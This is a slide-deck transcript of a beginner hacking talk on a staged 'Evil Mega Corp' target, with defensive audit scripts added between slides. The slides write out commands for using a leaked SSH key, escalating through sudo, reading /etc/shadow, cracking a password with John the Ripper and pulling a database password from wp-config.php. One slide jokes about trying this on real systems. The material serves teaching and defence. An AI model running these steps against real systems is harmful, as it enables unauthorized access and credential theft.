Slide 1

Slide 1 text

CYBER! CYBER! CYBER! CYBER! CYBER! Career Discovery in Cyber Security: a women's Symposium

Slide 2

Slide 2 text

Who is this person?
— Etsy security team.
— Spoke here last year (everything broke, never do live demos!)
— Been typing on computers for coins for 15+ years.

Slide 3

Slide 3 text

What are we talking about today? TEH SECURITIES

Slide 4

Slide 4 text

You will need:
— A web browser (we'll assume you have one of these!)
— An SSH client.
  — Unix/Mac: you have SSH, it's the best.
  — Windows: PuTTY
— nmap: www.nmap.org (optional)

Slide 5

Slide 5 text

No really, what are we talking about today?
— How you actually hax in to real live companies.
— Reconnaissance into systems.
— Lateral movement between systems.
— REAL LIFE HOW SYSTEMS GET HACKED.
— (you can go do this on real live systems, regrettably [1])

[1] May be illegal. Ask a grown up/lawyer/use a coffee shop.

Slide 6

Slide 6 text

Targeting evil corporations
I have preselected a target as we are time limited.
Evil Mega Corp: http://www.evilmegacorp.co/
Go look at their website, they're real evil...

Slide 7

Slide 7 text

Recon! Nmap!
Download it at www.nmap.org
Security tool that everyone uses. Makes a TCP/IP connection to each port on the target host and will tell you what is at the other end. (Can do cool stuff like run scripts at it.)

Slide 8

Slide 8 text

nmap

$ nmap -F -T4 -A www.evilmegacorp.co

Starting Nmap 6.47 ( http://nmap.org )
Nmap scan report for www.evilmegacorp.co (45.55.197.171)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: WordPress 4.2.3
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Evil Mega Corp | The most evil of mega corporations
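Added example, not part of the talk: the same scan output read from the defender's side. The script parses nmap's normal-format report into port records with their NSE script results, then lists what the host is disclosing to anyone who scans it (exact Apache version in the banner, exact WordPress version in the generator tag). The sample text is the slide's output reflowed onto separate lines, which is an assumption about its original layout.

```python
import re

# Constructed sample: the slide's nmap output, one line per report line.
SAMPLE_NMAP_OUTPUT = """\
Starting Nmap 6.47 ( http://nmap.org )
Nmap scan report for www.evilmegacorp.co (45.55.197.171)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: WordPress 4.2.3
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Evil Mega Corp | The most evil of mega corporations
"""

REPORT_LINE = re.compile(r"^Nmap scan report for (\S+)(?: \(([\d.]+)\))?")
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
SCRIPT_LINE = re.compile(r"^\|[_ ]([\w.-]+): ?(.*)$")


def parse_nmap_report(text):
    """Parse nmap normal output into {'target', 'ip', 'ports': [...]}.

    Each port record carries port, proto, state, service, version and a
    dict of NSE script results; continuation lines such as "|_/" are
    appended to the previous script's value.
    """
    report = {"target": None, "ip": None, "ports": []}
    current = None
    last_script = None
    for raw in text.splitlines():
        line = raw.rstrip()
        m = REPORT_LINE.match(line)
        if m:
            report["target"], report["ip"] = m.group(1), m.group(2)
            continue
        m = PORT_LINE.match(line)
        if m:
            current = {
                "port": int(m.group(1)), "proto": m.group(2),
                "state": m.group(3), "service": m.group(4),
                "version": m.group(5).strip(), "scripts": {},
            }
            report["ports"].append(current)
            last_script = None
            continue
        m = SCRIPT_LINE.match(line)
        if m and current is not None:
            last_script = m.group(1)
            current["scripts"][last_script] = m.group(2)
            continue
        if line.startswith("|") and current is not None and last_script:
            # Continuation of the previous script result (e.g. the "|_/" line).
            current["scripts"][last_script] += "\n" + line.lstrip("|_ ").strip()
    return report


def exposure_findings(report):
    """What a defender would fix first: banners and generator tags that hand
    out exact software versions, which is what lets an attacker pick exploits."""
    findings = []
    for p in report["ports"]:
        if p["state"] != "open":
            continue
        if re.search(r"\d+\.\d+", p["version"]):
            findings.append(f"{p['port']}/{p['proto']}: banner discloses '{p['version']}'")
        gen = p["scripts"].get("http-generator")
        if gen:
            findings.append(f"{p['port']}/{p['proto']}: generator tag discloses '{gen}'")
    return findings


if __name__ == "__main__":
    rep = parse_nmap_report(SAMPLE_NMAP_OUTPUT)
    print(rep["target"], rep["ip"])
    for line in exposure_findings(rep):
        print(" -", line)
```

Run it against `nmap -A` output of your own hosts: every line it prints is something the whole internet can read, and `ServerTokens Prod` plus removing the WordPress generator tag make both findings go away.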

Slide 9

Slide 9 text

More recon
Maybe there's something else, never give up. Let's go look at their website.
http://blog.evilmegacorp.co/about-us/
(Hint: I think Dave has a useful link)

Slide 10

Slide 10 text

Dotfiles!
They're the files that start with a dot.

% ls -laR
-rw-r--r--  1 discostu  staff     88 26 Jun 13:37 .bash_history
-rw-r--r--  1 discostu  staff    631  8 Apr  2014 .bash_profile
-rw-r--r--  1 discostu  staff  16993 23 Jul 19:29 .vimrc

.ssh:
total 2024
-rw-------  1 discostu  staff    312 30 May 10:59 authorized_keys
-rw-r--r--  1 discostu  staff   2595 23 Jul 17:34 known_hosts
-rw-------  1 discostu  staff   1264  9 Apr  2014 id_rsa

Prior art: GitRob, a Forbes article, and Dotfiles on Wikipedia.
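Added example, not from the talk: a scanner for the thing Dave did wrong here, publishing a home directory (or committing it to a repo, which is what GitRob hunts for). It walks a tree and flags files by name (the dotfiles in the listing above), by content (a PEM private key header in any file, whatever it is called) and, for known_hosts, counts unhashed entries, since those are exactly the internal host names used for lateral movement later in this talk. The demo tree it builds is constructed and its key material is a placeholder.

```python
import os
import re
import tempfile

# Names from the slide's listing that should never be published or committed.
SENSITIVE_NAMES = {
    ".bash_history", "id_rsa", "id_dsa", "id_ecdsa", "id_ed25519",
    "authorized_keys", "known_hosts",
}
# Matches "BEGIN RSA PRIVATE KEY", "BEGIN OPENSSH PRIVATE KEY", "BEGIN PRIVATE KEY".
PRIVATE_KEY_HEADER = re.compile(rb"-----BEGIN (?:[A-Z ]+ )?PRIVATE KEY-----")


def scan_tree(root):
    """Return sorted (relative_path, reason) pairs for every risky file under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            try:
                with open(path, "rb") as fh:
                    head = fh.read(4096)  # headers sit at the top; no need to read GBs
            except OSError:
                continue
            if PRIVATE_KEY_HEADER.search(head):
                findings.append((rel, "private key material"))
            elif name in SENSITIVE_NAMES:
                reason = "sensitive dotfile"
                if name == "known_hosts":
                    # OpenSSH hashes entries as "|1|salt|hash" when HashKnownHosts=yes;
                    # anything else is a readable host name or IP.
                    plain = [l for l in head.splitlines() if l and not l.startswith(b"|1|")]
                    reason = f"known_hosts ({len(plain)} unhashed entries reveal host names)"
                findings.append((rel, reason))
    return sorted(findings)


def build_demo_tree():
    """Constructed home directory shaped like the slide's listing (placeholder contents)."""
    root = tempfile.mkdtemp(prefix="dotfiles-demo-")
    os.makedirs(os.path.join(root, ".ssh"))
    files = {
        ".bash_history": b"ls\nssh 10.0.0.5\n",
        ".vimrc": b"set nocompatible\n",
        os.path.join(".ssh", "id_rsa"):
            b"-----BEGIN OPENSSH PRIVATE KEY-----\n(constructed placeholder)\n"
            b"-----END OPENSSH PRIVATE KEY-----\n",
        os.path.join(".ssh", "known_hosts"):
            b"10.0.0.5 ecdsa-sha2-nistp256 AAAA(constructed)\n"
            b"|1|abc=|def= ssh-ed25519 AAAA(constructed)\n",
        os.path.join(".ssh", "authorized_keys"): b"ssh-ed25519 AAAA(constructed) dave\n",
        # A key pasted into an innocently named file is still a key.
        "notes.txt": b"-----BEGIN RSA PRIVATE KEY-----\n(constructed)\n-----END RSA PRIVATE KEY-----\n",
    }
    for rel, data in files.items():
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(data)
    return root


if __name__ == "__main__":
    for rel, why in scan_tree(build_demo_tree()):
        print(f"{rel}: {why}")
```

Point it at a checkout before you push (`scan_tree(".")`) or wire it into a pre-commit hook; the content check matters more than the name check, because renaming id_rsa to notes.txt is the mistake people actually make.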

Slide 11

Slide 11 text

No content

Slide 12

Slide 12 text

No content

Slide 13

Slide 13 text

No content

Slide 14

Slide 14 text

Using SSH keys with SSH
Windows: Guide on DigitalOcean.com
Linux/OSX/"Unix": ssh -i ~/Downloads/id_rsa.txt dave@crush-it-bro.mooo.com
Username: dave
hostname/IP: crush-it-bro.mooo.com 104.236.53.106
keyfile:

Slide 15

Slide 15 text

Permission denied (but it's going to be okay)

Slide 16

Slide 16 text

$ ssh -i ~/Downloads/id_rsa.txt dave@crush-it-bro.mooo.com
Welcome to Ubuntu 14.04.2 LTS (GNU/Linux 3.13.0-57-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

  System information as of Sun Jul 26 03:02:12 EDT 2015

  System load:  0.0                Processes:           67
  Usage of /:   9.2% of 19.56GB   Users logged in:     0
  Memory usage: 14%                IP address for eth0: 104.236.53.106
  Swap usage:   0%                 IP address for eth1: 10.132.233.155

dave@boing:~$ cat .bash_history
id
ls
ls -la
vi .bash_profile
ssh 10.132.236.169
dave@boing:~$

Slide 17

Slide 17 text

Cool story, now what can I do?

dave@boing:~$ sudo -ln
....
User dave may run the following commands on boing:
    (root) NOPASSWD: ALL

WAIT WHAT? I can run sudo -s to get root WITH NO PASSWORD! COOL!
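Added example, not from the talk: a sudoers audit that finds the rule above before an attacker does. It parses plain user specs (`user host = (runas) TAG: commands`), skips Defaults and alias lines, and rates every NOPASSWD rule, with `NOPASSWD: ALL` flagged as critical because it is an unprotected root shell for anyone holding that user's SSH key. The sudoers text is constructed; the parser does not expand aliases or follow include directives.

```python
import re

# Constructed /etc/sudoers sample; the dave line mirrors the slide's sudo -l output.
SUDOERS_SAMPLE = """\
# constructed sample
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%admin  ALL=(ALL) ALL
dave    ALL=(root) NOPASSWD: ALL
backup  ALL=(root) NOPASSWD: /usr/bin/rsync
%sudo   ALL=(ALL:ALL) ALL
"""

USER_SPEC = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)
ALIAS_PREFIXES = ("Defaults", "User_Alias", "Host_Alias", "Cmnd_Alias", "Runas_Alias")


def parse_user_specs(text):
    """Return one dict per user specification line (aliases are not expanded)."""
    specs = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments
        if not line or line.startswith(ALIAS_PREFIXES):
            continue
        m = USER_SPEC.match(line)
        if not m:
            continue
        cmds = m.group("cmds")
        # Strip tag prefixes such as "NOPASSWD:" / "SETENV:" from each command.
        commands = [re.sub(r"^(?:\w+:\s*)+", "", c.strip()) for c in cmds.split(",")]
        specs.append({
            "user": m.group("user"),
            "host": m.group("host"),
            "runas": m.group("runas") or "root",
            "nopasswd": "NOPASSWD:" in cmds,
            "commands": commands,
        })
    return specs


def audit_sudoers(text):
    """Findings, worst first: NOPASSWD for ALL commands is CRITICAL,
    NOPASSWD for a fixed command list is a WARN worth reviewing."""
    findings = []
    for s in parse_user_specs(text):
        if not s["nopasswd"]:
            continue
        who = f"{s['user']}@{s['host']}"
        if "ALL" in s["commands"]:
            findings.append(f"CRITICAL {who}: NOPASSWD for ALL commands as ({s['runas']})")
        else:
            findings.append(f"WARN {who}: NOPASSWD for {', '.join(s['commands'])}")
    return findings


if __name__ == "__main__":
    for line in audit_sudoers(SUDOERS_SAMPLE):
        print(line)
```

On a real box feed it the output of `sudo cat /etc/sudoers /etc/sudoers.d/*`; the fix for the critical finding is to delete the rule or restrict it to the specific commands the account needs.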

Slide 18

Slide 18 text

Password cracking 101

root@boing:~# egrep 'dave:' /etc/shadow
dave:$1$heh$lZPrLI4ejKHiH6/okTMBQ.:16639:0:99999:7:::

John the Ripper docs. hashcat, which is similar, but newer. ArsTechnica article on how to crack passwords. SkullSecurity wiki page on passwords.

Slide 19

Slide 19 text

John the Ripper
You give john a big list of words, it will try them all and see if any match.

root@boing# rm -f /root/.john/john.pot
root@boing# john --wordlist=/usr/share/dict/wordlist.txt /etc/shadow
Loaded 1 password hash (md5crypt [MD5 32/64 X2])
Press 'q' or Ctrl-C to abort, almost any other key for status
yay dogs         (dave)
1g 0:00:00:27 100% 0.03673g/s 10733p/s 10733c/s 10733C/s yay dogs
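Added example, not from the talk: the two slides above show a `$1$` (md5crypt) hash falling to a wordlist in 27 seconds at roughly 10,000 candidates a second. This script audits shadow entries from the defender's side, classifying each password field by its crypt(3) prefix and flagging what a cracker would go after first: empty fields, legacy DES, md5crypt, and sha-crypt entries with rounds set below the default. Only the dave line is from the slide; the other entries are constructed and their hash bodies are placeholders.

```python
import re

# Constructed /etc/shadow excerpt. The dave line is the one on the slide.
SHADOW_SAMPLE = """\
root:$6$rounds=5000$saltsalt$constructedhashconstructedhashconstructedhash:16639:0:99999:7:::
dave:$1$heh$lZPrLI4ejKHiH6/okTMBQ.:16639:0:99999:7:::
alice:$y$j9T$constructedsalt$constructedhash:19000:0:99999:7:::
bob:$5$rounds=1000$shortsalt$constructedhash:16639:0:99999:7:::
www-data:*:16639:0:99999:7:::
svc:!:16639:0:99999:7:::
legacy::16639:0:99999:7:::
"""

# crypt(3) hash id -> (name, considered weak today?)
ALGORITHMS = {
    "1": ("md5crypt", True),
    "2a": ("bcrypt", False), "2b": ("bcrypt", False), "2y": ("bcrypt", False),
    "5": ("sha256crypt", False),
    "6": ("sha512crypt", False),
    "7": ("scrypt", False),
    "y": ("yescrypt", False),
    "gy": ("gost-yescrypt", False),
}
SHA_CRYPT_DEFAULT_ROUNDS = 5000


def classify_hash(field):
    """Return (status, detail) for one shadow password field.

    status is one of 'empty', 'locked', 'weak', 'ok'.
    """
    if field == "":
        return ("empty", "no password set: login succeeds with no password")
    if field.startswith(("*", "!")):
        return ("locked", "password login disabled")
    if not field.startswith("$"):
        return ("weak", "traditional DES crypt (8-char limit, trivially cracked)")
    parts = field.split("$")  # ['', id, param-or-salt, ...]
    algo_id = parts[1]
    name, weak = ALGORITHMS.get(algo_id, (f"unknown(${algo_id}$)", True))
    rounds = None
    if len(parts) > 2:
        m = re.match(r"rounds=(\d+)$", parts[2])
        if m:
            rounds = int(m.group(1))
    if weak:
        return ("weak", f"{name} is fast to brute-force; rehash with sha512crypt or yescrypt")
    if rounds is not None and algo_id in ("5", "6") and rounds < SHA_CRYPT_DEFAULT_ROUNDS:
        return ("weak", f"{name} with rounds={rounds}, below the default {SHA_CRYPT_DEFAULT_ROUNDS}")
    return ("ok", name + (f" rounds={rounds}" if rounds else ""))


def audit_shadow(text):
    """Return (user, status, detail) for every entry a cracker would target."""
    findings = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        user, field = line.split(":")[:2]
        status, detail = classify_hash(field)
        if status in ("empty", "weak"):
            findings.append((user, status, detail))
    return findings


if __name__ == "__main__":
    for user, status, detail in audit_shadow(SHADOW_SAMPLE):
        print(f"{status.upper():6} {user}: {detail}")
```

Rehashing happens at the next password change (set the stronger method in /etc/login.defs or PAM first), and a slow hash only buys time: "yay dogs" is in any decent wordlist and will fall to sha512crypt too, just more slowly.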

Slide 20

Slide 20 text

HACK THE GIBSON
Using the .ssh/known_hosts trickery from before combined with the password, what do we get?

dave@boing:~$ cat .ssh/known_hosts
10.132.236.169 ecdsa-sha2-nistp256 AAAAE2VjZ....
dave@boing:~$ ssh 10.132.236.169
dave@10.132.236.169's password:
dave@wordy:~$ id
uid=1000(dave) gid=1000(dave) groups=1000(dave)

Slide 21

Slide 21 text

Wordpress?

dave@wordy:~$ ls /var/www/html/
index.php           wp-comments-post.php  wp-includes        wp-settings.php
readme.html         wp-config-sample.php  wp-links-opml.php  wp-signup.php
wp-activate.php     wp-config.php         wp-load.php        wp-trackback.php
wp-admin            wp-content            wp-login.php
wp-blog-header.php  wp-cron.php           wp-mail.php

Slide 22

Slide 22 text

I wonder...

dave@wordy:~$ cd /var/www/html/
dave@wordy:/var/www/html$ ls -oh wp-config.php
-rw-r--r-- 1 www-data 2.7K Jul 22 16:22 wp-config.php

Wait, we can read the config file!?

Slide 23

Slide 23 text

MAD HAX

dave@wordy:~$ grep DB_ /var/www/html/wp-config.php
define('DB_NAME', 'wordpress');
define('DB_USER', 'wordpress');
define('DB_PASSWORD', 'QNqJgIJD39');
define('DB_HOST', 'localhost');
...

So now we have the database password!
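Added example, not from the talk: the previous two slides turn on one fact, wp-config.php being mode 0644 so that any shell account on the box can read the database password. This script audits a secrets-bearing config file's permission bits, then hardens it to 0640 (owner read/write, web-server group read, nothing for others) and re-checks. The demo file and its DB_PASSWORD value are constructed placeholders.

```python
import os
import stat
import tempfile


def audit_file_perms(path):
    """Return findings for a file that holds secrets; [] means acceptable.

    Flags 'other' read/write and group write. Group read is allowed so a
    deploy-user-owned file can still be read by the web server's group.
    """
    mode = stat.S_IMODE(os.stat(path).st_mode)
    findings = []
    if mode & stat.S_IROTH:
        findings.append("world-readable: any local account can read the secrets inside")
    if mode & stat.S_IWOTH:
        findings.append("world-writable: any local account can inject code or change the DB host")
    if mode & stat.S_IWGRP:
        findings.append("group-writable")
    return findings


def harden(path):
    """Strip all 'other' bits and group write, keep owner/group read. Returns the re-audit."""
    mode = stat.S_IMODE(os.stat(path).st_mode)
    os.chmod(path, mode & ~(stat.S_IRWXO | stat.S_IWGRP))
    return audit_file_perms(path)


def demo():
    """Constructed scenario: a wp-config.php left at 0644 as on the slide.

    Returns (findings before, findings after, final mode as an octal string).
    """
    workdir = tempfile.mkdtemp(prefix="wpconfig-demo-")
    path = os.path.join(workdir, "wp-config.php")
    with open(path, "w") as fh:
        fh.write("<?php\ndefine('DB_PASSWORD', 'constructed-placeholder');\n")
    os.chmod(path, 0o644)
    before = audit_file_perms(path)
    after = harden(path)
    return before, after, oct(stat.S_IMODE(os.stat(path).st_mode))


if __name__ == "__main__":
    before, after, mode = demo()
    print("before:", before)
    print("after: ", after, "mode", mode)
```

The permission fix closes the read on this slide; the separate lesson from the next one is that the wordpress DB user should not be able to reach anything but its own schema, so that even a leaked password does not hand over the whole server.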

Slide 24

Slide 24 text

I've got the key, I've got the secret

mysql -Dwordpress -uwordpress -pQNqJgIJD39

You now have full control of the database for all of Wordpress for the site.

Slide 25

Slide 25 text

What to do?

(root@localhost) [wordpress]> select * from wp_options where option_value like 'Evil Mega Corp';
+-----------+-------------+----------------+----------+
| option_id | option_name | option_value   | autoload |
+-----------+-------------+----------------+----------+
|         3 | blogname    | Evil Mega Corp | yes      |
+-----------+-------------+----------------+----------+
1 row in set (0.00 sec)

(root@localhost) [wordpress]> update wp_options set option_value='Yay happy kittens' where option_id = 3;
Query OK, 1 row affected (0.00 sec)
Rows matched: 1  Changed: 1  Warnings: 0

Slide 26

Slide 26 text

No content